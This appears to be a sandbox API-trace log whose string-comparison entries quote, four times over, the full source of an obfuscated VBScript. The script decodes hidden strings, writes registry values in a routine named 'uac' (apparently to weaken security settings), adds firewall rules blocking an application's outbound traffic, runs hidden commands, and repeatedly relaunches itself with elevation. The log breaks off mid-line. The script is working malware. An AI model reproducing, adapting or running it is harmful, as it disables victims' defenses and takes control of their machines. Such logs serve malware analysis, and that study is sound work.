bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.930] wcsncmp (_String1=" = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.930] wcsncmp (_String1="= 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.931] wcsncmp (_String1=" 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.931] wcsncmp (_String1="10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 